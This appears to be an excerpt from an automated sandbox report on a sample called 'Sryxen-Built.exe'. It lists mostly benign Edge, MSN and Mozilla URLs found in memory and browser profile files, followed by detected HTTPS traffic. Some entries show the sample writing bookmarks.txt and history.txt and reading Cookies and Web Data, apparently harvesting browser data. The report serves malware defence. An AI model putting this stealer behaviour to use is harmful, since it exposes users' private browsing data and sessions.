Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log9.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.dr, HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://gaana.com/
Source: NTtqcw9.db.0.drString found in binary or memory: https://gemini.google.com/app?q=
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://m.kugou.com/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://m.soundcloud.com/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://m.vk.com/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: Cookies.12.drString found in binary or memory: https://msn.comXID/
Source: Cookies.12.drString found in binary or memory: https://msn.comXIDv10
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://music.amazon.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://music.apple.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log5.11.drString found in binary or memory: https://ntp.msn.com
Source: 000003.log.11.drString found in binary or memory: https://ntp.msn.com/
Source: 000003.log.11.drString found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.11.drString found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.11.dr, 000003.log.11.drString found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log.11.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13385951012245184.11.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.11.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.11.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://open.spotify.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/0/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/0/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://sb.scorecardresearch.com/
Source: Sryxen-Built.exeString found in binary or memory: https://sectigo.com/CPS0
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://srtb.msn.com/
Source: NI5B49f.db.0.drString found in binary or memory: https://support.mozilla.org
Source: NI5B49f.db.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Sryxen-Built.exe, 00000000.00000003.1254378340.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, bookmarks.txt.0.drString found in binary or memory: https://support.mozilla.org/products/firefox
Source: NI5B49f.db.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://tidal.com/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://vibe.naver.com/today
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://web.telegram.org/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://web.whatsapp.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.deezer.com/
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, NTtqcw9.db.0.drString found in binary or memory: https://www.ecosia.org/newtab/v20
Source: content_new.js.11.dr, content.js.11.drString found in binary or memory: https://www.google.com/chrome
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, NTtqcw9.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Web Data.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.iheart.com/podcast/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.instagram.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.last.fm/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.messenger.com
Source: NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org
Source: Sryxen-Built.exe, 00000000.00000003.1254378340.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, bookmarks.txt.0.drString found in binary or memory: https://www.mozilla.org/about/
Source: NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Sryxen-Built.exe, 00000000.00000003.1255310974.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1254378340.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, bookmarks.txt.0.drString found in binary or memory: https://www.mozilla.org/contribute/
Source: NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: history.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Sryxen-Built.exe, 00000000.00000003.1253719023.0000018D48058000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1258545885.0000018D48060000.00000004.00000020.00020000.00000000.sdmp, CimdN7b.db.0.dr, NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Sryxen-Built.exe, 00000000.00000003.1253719023.0000018D48058000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1258545885.0000018D48060000.00000004.00000020.00020000.00000000.sdmp, CimdN7b.db.0.dr, NI5B49f.db.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.office.com
Source: Top Sites.11.drString found in binary or memory: https://www.office.com/
Source: Top Sites.11.drString found in binary or memory: https://www.office.com/Office
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.tiktok.com/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://www.youtube.com
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://y.music.163.com/m/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
